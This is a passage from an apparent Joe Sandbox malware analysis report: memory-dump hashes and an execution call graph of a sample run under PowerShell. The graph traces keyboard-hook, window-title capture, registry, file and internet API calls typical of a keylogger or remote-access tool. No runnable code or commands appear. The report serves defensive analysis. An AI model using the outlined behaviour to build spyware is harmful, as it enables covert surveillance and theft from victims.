                    • Opcode ID: b0f10a736307255401b341c7f5dae05bb9916dc1cabf5ed4863f5e5cfe193ac2
                    • Instruction ID: 5f779bcc847035b254f856760a316214e26bb103eb182ed8659f2fed56a8f8f3
                    • Opcode Fuzzy Hash: b0f10a736307255401b341c7f5dae05bb9916dc1cabf5ed4863f5e5cfe193ac2
                    • Instruction Fuzzy Hash: 8D01D475419340AAE7106E25CC84B6BBF98EF41324F18841AEC454A2C6C6B9D849C7B1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb325c27611db059247a7ac22c6be8a1c56f6dbff7153b3a93f0e2c69cdd1a7e
                    • Instruction ID: be771336e32296e9d99dbf894907cb03bcb03bc18db1f47afb687a851be45891
                    • Opcode Fuzzy Hash: fb325c27611db059247a7ac22c6be8a1c56f6dbff7153b3a93f0e2c69cdd1a7e
                    • Instruction Fuzzy Hash: 39F0C2B070030837DA6426698856F6F69AAAFC9B00F508018F945EF3C1DDB29C8543A5
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436508438.000000000028D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0028D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_28d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b11a5d1856cf47ad867d05b4e91c4b56feb2fa269267b977520b81cfa7f39ea9
                    • Instruction ID: 97fc36181cca846673fbe07b2b81694f3c8a22d1a2e8d0cd0c064f0453ee5b79
                    • Opcode Fuzzy Hash: b11a5d1856cf47ad867d05b4e91c4b56feb2fa269267b977520b81cfa7f39ea9
                    • Instruction Fuzzy Hash: 36F04F71445244AAE7109E16CCC4B67FB98EB51724F18C55AED484A2D6C279AC48CBB1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436745143.0000000001B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1b70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$$p$$p
                    • API String ID: 0-1154554433
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p$$p$$p$$p
                    • API String ID: 0-2834719986
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $p$$p$$p$$p$$p$$p
                    • API String ID: 0-3402276426
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.436908690.0000000001D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D70000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_1d70000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'p$4'p$$p$$p$$p
                    • API String ID: 0-2334450948

                    Execution Graph

                    Execution Coverage:4.9%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.7%
                    Total number of Nodes:1635
                    Total number of Limit Nodes:60
402533 48305->48289 48306->48297 48328 402888 48307->48328 48309 40257d 48310 402592 48309->48310 48311 4025a7 48309->48311 48333 402a34 22 API calls 48310->48333 48313 4028e8 28 API calls 48311->48313 48316 4025a5 48313->48316 48314 40259b 48334 4029da 22 API calls 48314->48334 48316->48305 48318 4028f1 48317->48318 48319 402953 48318->48319 48320 4028fb 48318->48320 48342 4028a4 22 API calls 48319->48342 48323 402904 48320->48323 48324 402917 48320->48324 48336 402cae 48323->48336 48326 402915 48324->48326 48327 4023ce 11 API calls 48324->48327 48326->48305 48327->48326 48329 402890 48328->48329 48330 402898 48329->48330 48335 402ca3 22 API calls 48329->48335 48330->48309 48333->48314 48334->48316 48337 402cb8 __EH_prolog 48336->48337 48343 402e54 22 API calls 48337->48343 48339 4023ce 11 API calls 48341 402d92 48339->48341 48340 402d24 48340->48339 48341->48326 48343->48340 48345 4020e7 48344->48345 48346 4023ce 11 API calls 48345->48346 48347 4020f2 48346->48347 48347->47890 48353 40423a 48348->48353 48351->47890 48352->47900 48354 404243 48353->48354 48355 4023ce 11 API calls 48354->48355 48356 40424e 48355->48356 48357 402569 28 API calls 48356->48357 48358 4041b5 48357->48358 48358->47890 48359->47904 48360->47909 48361->47907 48365 4032aa 48363->48365 48364 4032c9 48364->47920 48365->48364 48366 4028e8 28 API calls 48365->48366 48366->48364 48368 4051fb 48367->48368 48377 405274 48368->48377 48370 405208 48370->47923 48372 402061 48371->48372 48373 4023ce 11 API calls 48372->48373 48374 40207b 48373->48374 48399 40267a 48374->48399 48378 405282 48377->48378 48379 405288 48378->48379 48380 40529e 48378->48380 48388 4025f0 48379->48388 48382 4052f5 48380->48382 48383 4052b6 48380->48383 48397 4028a4 22 API calls 48382->48397 48386 4028e8 28 API calls 48383->48386 48387 40529c 48383->48387 48386->48387 48387->48370 48389 402888 22 API calls 48388->48389 48390 402602 48389->48390 48391 402672 48390->48391 48393 402629 48390->48393 48398 4028a4 22 API calls 
48391->48398 48395 4028e8 28 API calls 48393->48395 48396 40263b 48393->48396 48395->48396 48396->48387 48400 40268b 48399->48400 48401 4023ce 11 API calls 48400->48401 48402 40208d 48401->48402 48402->47926 48403->47928 48404->47939 48407 41bfc4 GetCurrentProcess 48406->48407 48408 41b2d1 48406->48408 48407->48408 48409 4135a6 RegOpenKeyExA 48408->48409 48410 4135d4 RegQueryValueExA RegCloseKey 48409->48410 48411 4135fe 48409->48411 48410->48411 48412 402093 28 API calls 48411->48412 48413 413613 48412->48413 48413->47950 48414->47961 48416 40b90c 48415->48416 48421 402252 48416->48421 48418 40b917 48425 40b92c 48418->48425 48420 40b926 48420->47969 48422 40225c 48421->48422 48423 4022ac 48421->48423 48422->48423 48432 402779 11 API calls std::_Deallocate 48422->48432 48423->48418 48426 40b966 48425->48426 48427 40b938 48425->48427 48444 4028a4 22 API calls 48426->48444 48433 4027e6 48427->48433 48431 40b942 48431->48420 48432->48423 48434 4027ef 48433->48434 48435 402851 48434->48435 48436 4027f9 48434->48436 48446 4028a4 22 API calls 48435->48446 48439 402802 48436->48439 48440 402815 48436->48440 48445 402aea 28 API calls __EH_prolog 48439->48445 48442 402813 48440->48442 48443 402252 11 API calls 48440->48443 48442->48431 48443->48442 48445->48442 48447->47978 48449 402347 48448->48449 48450 402252 11 API calls 48449->48450 48451 4023c7 48450->48451 48451->47978 48453 4024f9 48452->48453 48454 40250a 28 API calls 48453->48454 48455 4020b1 48454->48455 48455->47482 48472 43ba0a 48456->48472 48458 43ae50 48459 43a7b7 _strftime 36 API calls 48458->48459 48464 43ae5c 48459->48464 48460 43ae15 48460->48458 48461 43ae2a 48460->48461 48471 43ae2f _Atexit 48460->48471 48477 4405dd 20 API calls _Atexit 48461->48477 48465 43ae8b 48464->48465 48478 43ba4f 40 API calls __Tolower 48464->48478 48468 43aef7 48465->48468 48479 43b9b6 20 API calls 2 library calls 48465->48479 48480 43b9b6 20 API calls 2 library calls 48468->48480 48469 43afbe _strftime 48469->48471 48481 
4405dd 20 API calls _Atexit 48469->48481 48471->48007 48473 43ba22 48472->48473 48474 43ba0f 48472->48474 48473->48460 48482 4405dd 20 API calls _Atexit 48474->48482 48476 43ba14 _Atexit 48476->48460 48477->48471 48478->48464 48479->48468 48480->48469 48481->48471 48482->48476 48489 401fb0 48483->48489 48485 402f1e 48486 402055 11 API calls 48485->48486 48487 402f2d 48486->48487 48487->48021 48488->48024 48490 4025f0 28 API calls 48489->48490 48491 401fbd 48490->48491 48491->48485 48493 40a127 48492->48493 48494 413549 3 API calls 48493->48494 48495 40a12e 48494->48495 48496 40a142 48495->48496 48497 40a15c 48495->48497 48498 409e9b 48496->48498 48499 40a147 48496->48499 48513 40905c 48497->48513 48498->47533 48501 40905c 28 API calls 48499->48501 48503 40a155 48501->48503 48541 40a22d 29 API calls 48503->48541 48506 40a15a 48506->48498 48507->48049 48689 403222 48508->48689 48510 403022 48693 403262 48510->48693 48514 409072 48513->48514 48515 402252 11 API calls 48514->48515 48516 40908c 48515->48516 48542 404267 48516->48542 48518 40909a 48519 40a179 48518->48519 48554 40b8ec 48519->48554 48522 40a1a2 48525 402093 28 API calls 48522->48525 48523 40a1ca 48524 402093 28 API calls 48523->48524 48527 40a1d5 48524->48527 48526 40a1ac 48525->48526 48528 41bc5e 28 API calls 48526->48528 48529 402093 28 API calls 48527->48529 48530 40a1ba 48528->48530 48531 40a1e4 48529->48531 48558 40b164 31 API calls new 48530->48558 48533 41b4ef 80 API calls 48531->48533 48535 40a1e9 CreateThread 48533->48535 48534 40a1c1 48536 401fd8 11 API calls 48534->48536 48537 40a210 CreateThread 48535->48537 48538 40a204 CreateThread 48535->48538 48566 40a27d 48535->48566 48536->48523 48539 401f09 11 API calls 48537->48539 48563 40a289 48537->48563 48538->48537 48560 40a267 48538->48560 48540 40a224 48539->48540 48540->48498 48541->48506 48688 40a273 163 API calls 48541->48688 48543 402888 22 API calls 48542->48543 48544 40427b 48543->48544 48545 404290 48544->48545 48546 4042a5 48544->48546 
48552 4042df 22 API calls 48545->48552 48547 4027e6 28 API calls 48546->48547 48549 4042a3 48547->48549 48549->48518 48550 404299 48553 402c48 22 API calls 48550->48553 48552->48550 48553->48549 48555 40b8f5 48554->48555 48556 40a197 48554->48556 48559 40b96c 28 API calls 48555->48559 48556->48522 48556->48523 48558->48534 48559->48556 48569 40a2b8 48560->48569 48599 40acd6 48563->48599 48641 40a726 48566->48641 48570 40a2d1 GetModuleHandleA SetWindowsHookExA 48569->48570 48571 40a333 GetMessageA 48569->48571 48570->48571 48573 40a2ed GetLastError 48570->48573 48572 40a345 TranslateMessage DispatchMessageA 48571->48572 48583 40a270 48571->48583 48572->48571 48572->48583 48584 41bb8e 48573->48584 48590 441e81 48584->48590 48587 402093 28 API calls 48588 40a2fe 48587->48588 48589 4052fd 28 API calls 48588->48589 48591 441e8d 48590->48591 48594 441c7d 48591->48594 48593 41bbb2 48593->48587 48595 441c94 48594->48595 48597 441ccb _Atexit 48595->48597 48598 4405dd 20 API calls _Atexit 48595->48598 48597->48593 48598->48597 48628 40ace4 48599->48628 48600 40a292 48601 40ad3e Sleep GetForegroundWindow GetWindowTextLengthW 48602 40b904 28 API calls 48601->48602 48602->48628 48607 41bae6 GetTickCount 48607->48628 48608 40ad84 GetWindowTextW 48608->48628 48610 40b8ec 28 API calls 48610->48628 48611 40aedc 48612 401f09 11 API calls 48611->48612 48612->48600 48613 40ae49 Sleep 48613->48628 48614 441e81 20 API calls 48614->48628 48616 402093 28 API calls 48616->48628 48617 40add1 48619 40905c 28 API calls 48617->48619 48617->48628 48637 40b164 31 API calls new 48617->48637 48619->48617 48621 403014 28 API calls 48621->48628 48622 406383 28 API calls 48622->48628 48624 40a636 12 API calls 48624->48628 48625 41bc5e 28 API calls 48625->48628 48626 401f09 11 API calls 48626->48628 48627 401fd8 11 API calls 48627->48628 48628->48600 48628->48601 48628->48607 48628->48608 48628->48610 48628->48611 48628->48613 48628->48614 48628->48616 48628->48617 48628->48621 48628->48622 
48628->48624 48628->48625 48628->48626 48628->48627 48629 4343e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48628->48629 48630 401f86 48628->48630 48634 434770 23 API calls __onexit 48628->48634 48635 4343a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48628->48635 48636 409044 28 API calls 48628->48636 48638 40b97c 28 API calls 48628->48638 48639 40b748 40 API calls 2 library calls 48628->48639 48640 4052fd 28 API calls 48628->48640 48631 401f8e 48630->48631 48632 402252 11 API calls 48631->48632 48633 401f99 48632->48633 48633->48628 48634->48628 48635->48628 48636->48628 48637->48617 48638->48628 48639->48628 48642 40a73b Sleep 48641->48642 48662 40a675 48642->48662 48644 40a286 48645 40a77b CreateDirectoryW 48649 40a74d 48645->48649 48646 40a78c GetFileAttributesW 48646->48649 48647 40a7a3 SetFileAttributesW 48647->48649 48649->48642 48649->48644 48649->48646 48649->48647 48651 401e65 22 API calls 48649->48651 48660 40a76f 48649->48660 48675 41c3f1 48649->48675 48650 40a81d PathFileExistsW 48650->48660 48651->48649 48652 4020df 11 API calls 48652->48660 48653 4020b7 28 API calls 48653->48660 48655 40a926 SetFileAttributesW 48655->48649 48656 406dd8 28 API calls 48656->48660 48657 401fe2 28 API calls 48657->48660 48658 401fd8 11 API calls 48658->48660 48660->48645 48660->48650 48660->48652 48660->48653 48660->48655 48660->48656 48660->48657 48660->48658 48661 401fd8 11 API calls 48660->48661 48685 41c485 32 API calls 48660->48685 48686 41c4f2 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48660->48686 48661->48649 48663 40a722 48662->48663 48665 40a68b 48662->48665 48663->48649 48664 40a6aa CreateFileW 48664->48665 48666 40a6b8 GetFileSize 48664->48666 48665->48664 48667 40a6ed CloseHandle 48665->48667 48668 40a6ff 48665->48668 48669 40a6e2 Sleep 48665->48669 48670 40a6db 48665->48670 48666->48665 48666->48667 48667->48665 48668->48663 48672 40905c 28 
API calls 48668->48672 48669->48667 48687 40b0dc 84 API calls 48670->48687 48673 40a71b 48672->48673 48674 40a179 124 API calls 48673->48674 48674->48663 48676 41c404 CreateFileW 48675->48676 48678 41c441 48676->48678 48679 41c43d 48676->48679 48680 41c461 WriteFile 48678->48680 48681 41c448 SetFilePointer 48678->48681 48679->48649 48683 41c474 48680->48683 48684 41c476 CloseHandle 48680->48684 48681->48680 48682 41c458 CloseHandle 48681->48682 48682->48679 48683->48684 48684->48679 48685->48660 48686->48660 48687->48669 48690 40322e 48689->48690 48699 403618 48690->48699 48692 40323b 48692->48510 48694 40326e 48693->48694 48695 402252 11 API calls 48694->48695 48696 403288 48695->48696 48697 402336 11 API calls 48696->48697 48698 403031 48697->48698 48698->48054 48700 403626 48699->48700 48701 403644 48700->48701 48702 40362c 48700->48702 48704 40369e 48701->48704 48706 40365c 48701->48706 48710 4036a6 28 API calls 48702->48710 48711 4028a4 22 API calls 48704->48711 48708 4027e6 28 API calls 48706->48708 48709 403642 48706->48709 48708->48709 48709->48692 48710->48709 48713 404186 48712->48713 48714 402252 11 API calls 48713->48714 48715 404191 48714->48715 48723 4041bc 48715->48723 48718 4042fc 48734 404353 48718->48734 48720 40430a 48721 403262 11 API calls 48720->48721 48722 404319 48721->48722 48722->48063 48724 4041c8 48723->48724 48727 4041d9 48724->48727 48726 40419c 48726->48718 48728 4041e9 48727->48728 48729 404206 48728->48729 48730 4041ef 48728->48730 48731 4027e6 28 API calls 48729->48731 48732 404267 28 API calls 48730->48732 48733 404204 48731->48733 48732->48733 48733->48726 48735 40435f 48734->48735 48738 404371 48735->48738 48737 40436d 48737->48720 48739 40437f 48738->48739 48740 404385 48739->48740 48741 40439e 48739->48741 48804 4034e6 28 API calls 48740->48804 48742 402888 22 API calls 48741->48742 48743 4043a6 48742->48743 48745 404419 48743->48745 48746 4043bf 48743->48746 48805 4028a4 22 API calls 48745->48805 48749 4027e6 28 API calls 
48746->48749 48757 40439c 48746->48757 48749->48757 48757->48737 48804->48757 48812 43aa9a 48806->48812 48810 4138b9 48809->48810 48811 41388f RegSetValueExA RegCloseKey 48809->48811 48810->48082 48811->48810 48815 43aa1b 48812->48815 48814 40170d 48814->48080 48816 43aa2a 48815->48816 48817 43aa3e 48815->48817 48828 4405dd 20 API calls _Atexit 48816->48828 48820 43aa2f __alldvrm _Atexit 48817->48820 48821 448957 48817->48821 48820->48814 48822 4484ca _Atexit 5 API calls 48821->48822 48823 44897e 48822->48823 48824 448996 GetSystemTimeAsFileTime 48823->48824 48825 44898a 48823->48825 48824->48825 48826 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48825->48826 48827 4489a7 48826->48827 48827->48820 48828->48820 48832 41b8f9 _Yarn ___scrt_fastfail 48829->48832 48830 402093 28 API calls 48831 414f49 48830->48831 48831->48088 48832->48830 48833->48105 48835 414f02 getaddrinfo WSASetLastError 48834->48835 48836 414ef8 48834->48836 48835->48157 48974 414d86 48836->48974 48840 404846 socket 48839->48840 48841 404839 48839->48841 48842 404860 CreateEventW 48840->48842 48843 404842 48840->48843 49013 40489e WSAStartup 48841->49013 48842->48157 48843->48157 48845 40483e 48845->48840 48845->48843 48847 404f65 48846->48847 48848 404fea 48846->48848 48849 404f6e 48847->48849 48850 404fc0 CreateEventA CreateThread 48847->48850 48851 404f7d GetLocalTime 48847->48851 48848->48157 48849->48850 48850->48848 49015 405150 48850->49015 48852 41bb8e 28 API calls 48851->48852 48853 404f91 48852->48853 49014 4052fd 28 API calls 48853->49014 48862 404a1b 48861->48862 48863 4048ee 48861->48863 48864 40497e 48862->48864 48865 404a21 WSAGetLastError 48862->48865 48863->48864 48866 404923 48863->48866 48868 40531e 28 API calls 48863->48868 48864->48157 48865->48864 48867 404a31 48865->48867 49019 420c60 27 API calls 48866->49019 48869 404932 48867->48869 48870 404a36 48867->48870 48873 40490f 48868->48873 48876 402093 28 API calls 48869->48876 49024 41cae1 30 API 
calls 48870->49024 48872 40492b 48872->48869 48875 404941 48872->48875 48877 402093 28 API calls 48873->48877 48885 404950 48875->48885 48886 404987 48875->48886 48879 404a80 48876->48879 48880 40491e 48877->48880 48878 404a40 49025 4052fd 28 API calls 48878->49025 48882 402093 28 API calls 48879->48882 48883 41b4ef 80 API calls 48880->48883 48887 404a8f 48882->48887 48883->48866 48891 402093 28 API calls 48885->48891 49021 421a40 54 API calls 48886->49021 48892 41b4ef 80 API calls 48887->48892 48895 40495f 48891->48895 48892->48864 48893 40498f 48896 4049c4 48893->48896 48897 404994 48893->48897 48899 402093 28 API calls 48895->48899 49023 420e06 28 API calls 48896->49023 48900 402093 28 API calls 48897->48900 48902 40496e 48899->48902 48904 4049a3 48900->48904 48905 41b4ef 80 API calls 48902->48905 48907 402093 28 API calls 48904->48907 48908 404973 48905->48908 48906 4049cc 48909 4049f9 CreateEventW CreateEventW 48906->48909 48911 402093 28 API calls 48906->48911 48910 4049b2 48907->48910 49020 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48908->49020 48909->48864 48913 41b4ef 80 API calls 48910->48913 48912 4049e2 48911->48912 48915 402093 28 API calls 48912->48915 48916 4049b7 48913->48916 48917 4049f1 48915->48917 49022 4210b2 52 API calls 48916->49022 48919 41b4ef 80 API calls 48917->48919 48920 4049f6 48919->48920 48920->48909 49026 41b7b6 GlobalMemoryStatusEx 48921->49026 48923 41b7f5 48923->48157 49027 414580 48924->49027 48928 40dda5 48927->48928 48929 4134ff 3 API calls 48928->48929 48931 40ddac 48929->48931 48930 40ddc4 48930->48157 48931->48930 48932 413549 3 API calls 48931->48932 48932->48930 48934 4020b7 28 API calls 48933->48934 48935 41bc57 48934->48935 48935->48157 48937 41bd2b 48936->48937 48938 4020b7 28 API calls 48937->48938 48939 41bd3d 48938->48939 48939->48157 48941 41bafc GetTickCount 48940->48941 48941->48174 48943 436e90 ___scrt_fastfail 48942->48943 48944 41bab5 GetForegroundWindow GetWindowTextW 48943->48944 
48945 40417e 28 API calls 48944->48945 48946 41badf 48945->48946 48946->48174 48947->48174 48948->48174 48950 4020df 11 API calls 48949->48950 48951 404c27 48950->48951 48952 4020df 11 API calls 48951->48952 48964 404c30 48952->48964 48953 43bd51 new 21 API calls 48953->48964 48955 404c96 48957 404ca1 48955->48957 48955->48964 48956 4020b7 28 API calls 48956->48964 49069 404e26 99 API calls 48957->49069 48958 401fe2 28 API calls 48958->48964 48960 404ca8 48962 401fd8 11 API calls 48960->48962 48961 401fd8 11 API calls 48961->48964 48963 404cb1 48962->48963 48965 401fd8 11 API calls 48963->48965 48964->48953 48964->48955 48964->48956 48964->48958 48964->48961 49056 404cc3 48964->49056 49068 404b96 57 API calls 48964->49068 48966 404cba 48965->48966 48966->48134 48968->48157 48969->48134 48971->48174 48972->48134 48973->48134 48975 414dc8 GetSystemDirectoryA 48974->48975 48992 414ecf 48974->48992 48976 414de3 48975->48976 48975->48992 48995 441a3e 48976->48995 48978 414dff 49002 441a98 48978->49002 48980 414e0f LoadLibraryA 48981 414e31 GetProcAddress 48980->48981 48982 414e42 48980->48982 48981->48982 48983 414e3d FreeLibrary 48981->48983 48984 441a3e ___std_exception_copy 20 API calls 48982->48984 48993 414e93 48982->48993 48983->48982 48985 414e5e 48984->48985 48986 441a98 20 API calls 48985->48986 48989 414e6e LoadLibraryA 48986->48989 48987 414e99 GetProcAddress 48988 414eb4 FreeLibrary 48987->48988 48987->48993 48990 414eb2 48988->48990 48991 414e82 GetProcAddress 48989->48991 48989->48992 48990->48992 48991->48993 48994 414e8e FreeLibrary 48991->48994 48992->48835 48993->48987 48993->48990 48993->48992 48994->48993 48996 441a59 48995->48996 48997 441a4b 48995->48997 49009 4405dd 20 API calls _Atexit 48996->49009 48997->48996 49000 441a70 48997->49000 48999 441a61 _Atexit 48999->48978 49000->48999 49010 4405dd 20 API calls _Atexit 49000->49010 49003 441ab4 49002->49003 49005 441aa6 49002->49005 49011 4405dd 20 API calls _Atexit 49003->49011 49005->49003 49006 
441add 49005->49006 49008 441abc _Atexit 49006->49008 49012 4405dd 20 API calls _Atexit 49006->49012 49008->48980 49009->48999 49010->48999 49011->49008 49012->49008 49013->48845 49018 40515c 102 API calls 49015->49018 49017 405159 49018->49017 49019->48872 49020->48864 49021->48893 49022->48908 49023->48906 49024->48878 49026->48923 49030 414553 49027->49030 49031 414568 ___scrt_initialize_default_local_stdio_options 49030->49031 49034 43f79d 49031->49034 49037 43c4f0 49034->49037 49038 43c530 49037->49038 49039 43c518 49037->49039 49038->49039 49041 43c538 49038->49041 49052 4405dd 20 API calls _Atexit 49039->49052 49042 43a7b7 _strftime 36 API calls 49041->49042 49043 43c548 49042->49043 49053 43cc76 20 API calls 2 library calls 49043->49053 49044 43c51d _Atexit 49046 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 49044->49046 49048 414576 49046->49048 49047 43c5c0 49054 43d2e4 51 API calls 3 library calls 49047->49054 49048->48157 49051 43c5cb 49055 43cce0 20 API calls _free 49051->49055 49052->49044 49053->49047 49054->49051 49055->49044 49057 4020df 11 API calls 49056->49057 49066 404cde 49057->49066 49058 404e13 49059 401fd8 11 API calls 49058->49059 49060 404e1c 49059->49060 49060->48955 49061 4041a2 28 API calls 49061->49066 49062 401fe2 28 API calls 49062->49066 49063 401fc0 28 API calls 49065 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49063->49065 49064 4020f6 28 API calls 49064->49066 49065->49066 49070 415aea 49065->49070 49066->49058 49066->49061 49066->49062 49066->49063 49066->49064 49067 401fd8 11 API calls 49066->49067 49067->49066 49068->48964 49069->48960 49071 4020f6 28 API calls 49070->49071 49072 415b0c SetEvent 49071->49072 49073 415b21 49072->49073 49074 4041a2 28 API calls 49073->49074 49075 415b3b 49074->49075 49076 4020f6 28 API calls 49075->49076 49077 415b4b 49076->49077 49078 4020f6 28 API calls 49077->49078 49079 415b5d 49078->49079 49080 41be1b 28 API calls 49079->49080 49081 415b66 
49080->49081 49082 417089 49081->49082 49083 415b86 GetTickCount 49081->49083 49084 415d2f 49081->49084 49085 401e8d 11 API calls 49082->49085 49086 41bb8e 28 API calls 49083->49086 49084->49082 49147 415ce5 49084->49147 49087 417092 49085->49087 49088 415b97 49086->49088 49090 401fd8 11 API calls 49087->49090 49091 41bae6 GetTickCount 49088->49091 49092 41709e 49090->49092 49093 415ba3 49091->49093 49094 401fd8 11 API calls 49092->49094 49095 41bb8e 28 API calls 49093->49095 49096 4170aa 49094->49096 49097 415bae 49095->49097 49098 41ba96 30 API calls 49097->49098 49099 415bbc 49098->49099 49100 41bd1e 28 API calls 49099->49100 49101 415bca 49100->49101 49102 401e65 22 API calls 49101->49102 49103 415bd8 49102->49103 49149 402f31 28 API calls 49103->49149 49105 415be6 49150 402ea1 28 API calls 49105->49150 49107 415bf5 49108 402f10 28 API calls 49107->49108 49109 415c04 49108->49109 49151 402ea1 28 API calls 49109->49151 49111 415c13 49112 402f10 28 API calls 49111->49112 49113 415c1f 49112->49113 49152 402ea1 28 API calls 49113->49152 49115 415c29 49153 404aa1 61 API calls _Yarn 49115->49153 49117 415c38 49118 401fd8 11 API calls 49117->49118 49119 415c41 49118->49119 49120 401fd8 11 API calls 49119->49120 49121 415c4d 49120->49121 49122 401fd8 11 API calls 49121->49122 49123 415c59 49122->49123 49124 401fd8 11 API calls 49123->49124 49125 415c65 49124->49125 49126 401fd8 11 API calls 49125->49126 49127 415c71 49126->49127 49128 401fd8 11 API calls 49127->49128 49129 415c7d 49128->49129 49130 401f09 11 API calls 49129->49130 49131 415c86 49130->49131 49132 401fd8 11 API calls 49131->49132 49133 415c8f 49132->49133 49134 401fd8 11 API calls 49133->49134 49135 415c98 49134->49135 49136 401e65 22 API calls 49135->49136 49137 415ca3 49136->49137 49138 43baac _strftime 40 API calls 49137->49138 49139 415cb0 49138->49139 49140 415cb5 49139->49140 49141 415cdb 49139->49141 49143 415cc3 49140->49143 49144 415cce 49140->49144 49142 401e65 22 API calls 49141->49142 
49142->49147 49154 404ff4 82 API calls 49143->49154 49146 404f51 105 API calls 49144->49146 49148 415cc9 49146->49148 49147->49082 49155 4050e4 84 API calls 49147->49155 49148->49082 49149->49105 49150->49107 49151->49111 49152->49115 49153->49117 49154->49148 49155->49148 49157->48207 49158->48234 49159->48233 49160->48222 49161->48226 49162->48232 49163->48265 49168 40f7c2 49166->49168 49167 413549 3 API calls 49167->49168 49168->49167 49169 40f866 49168->49169 49171 40f856 Sleep 49168->49171 49188 40f7f4 49168->49188 49172 40905c 28 API calls 49169->49172 49170 40905c 28 API calls 49170->49188 49171->49168 49173 40f871 49172->49173 49176 41bc5e 28 API calls 49173->49176 49175 41bc5e 28 API calls 49175->49188 49177 40f87d 49176->49177 49201 413814 14 API calls 49177->49201 49180 401f09 11 API calls 49180->49188 49181 40f890 49182 401f09 11 API calls 49181->49182 49184 40f89c 49182->49184 49183 402093 28 API calls 49183->49188 49185 402093 28 API calls 49184->49185 49186 40f8ad 49185->49186 49189 41376f 14 API calls 49186->49189 49187 41376f 14 API calls 49187->49188 49188->49170 49188->49171 49188->49175 49188->49180 49188->49183 49188->49187 49199 40d096 112 API calls ___scrt_fastfail 49188->49199 49200 413814 14 API calls 49188->49200 49190 40f8c0 49189->49190 49202 412850 TerminateProcess WaitForSingleObject 49190->49202 49192 40f8c8 ExitProcess 49203 4127ee 62 API calls 49196->49203 49200->49188 49201->49181 49202->49192 49204 4269e6 49205 4269fb 49204->49205 49216 426a8d 49204->49216 49206 426b44 49205->49206 49207 426abd 49205->49207 49208 426b1d 49205->49208 49211 426af2 49205->49211 49212 426a48 49205->49212 49205->49216 49218 426a7d 49205->49218 49232 424edd 49 API calls _Yarn 49205->49232 49206->49216 49237 426155 28 API calls 49206->49237 49207->49211 49207->49216 49235 41fb6c 52 API calls 49207->49235 49208->49206 49208->49216 49220 425ae1 49208->49220 49211->49208 49236 4256f0 21 API calls 49211->49236 49212->49216 49212->49218 49233 41fb6c 52 API 
calls 49212->49233 49218->49207 49218->49216 49234 424edd 49 API calls _Yarn 49218->49234 49221 425b00 ___scrt_fastfail 49220->49221 49223 425b0f 49221->49223 49226 425b34 49221->49226 49238 41ebbb 21 API calls 49221->49238 49223->49226 49231 425b14 49223->49231 49239 4205d8 46 API calls 49223->49239 49226->49206 49227 425b1d 49227->49226 49242 424d05 21 API calls 2 library calls 49227->49242 49229 425bb7 49229->49226 49240 432ec4 21 API calls new 49229->49240 49231->49226 49231->49227 49241 41da5f 49 API calls 49231->49241 49232->49212 49233->49212 49234->49207 49235->49207 49236->49208 49237->49216 49238->49223 49239->49229 49240->49231 49241->49227 49242->49226 49243 434875 49248 434b47 SetUnhandledExceptionFilter 49243->49248 49245 43487a pre_c_initialization 49249 44554b 20 API calls 2 library calls 49245->49249 49247 434885 49248->49245 49249->49247 49250 415d06 49265 41b380 49250->49265 49252 415d0f 49253 4020f6 28 API calls 49252->49253 49254 415d1e 49253->49254 49276 404aa1 61 API calls _Yarn 49254->49276 49256 415d2a 49257 417089 49256->49257 49258 401fd8 11 API calls 49256->49258 49259 401e8d 11 API calls 49257->49259 49258->49257 49260 417092 49259->49260 49261 401fd8 11 API calls 49260->49261 49262 41709e 49261->49262 49263 401fd8 11 API calls 49262->49263 49264 4170aa 49263->49264 49266 4020df 11 API calls 49265->49266 49267 41b38e 49266->49267 49268 43bd51 new 21 API calls 49267->49268 49269 41b39e InternetOpenW InternetOpenUrlW 49268->49269 49270 41b3c5 InternetReadFile 49269->49270 49274 41b3e8 49270->49274 49271 4020b7 28 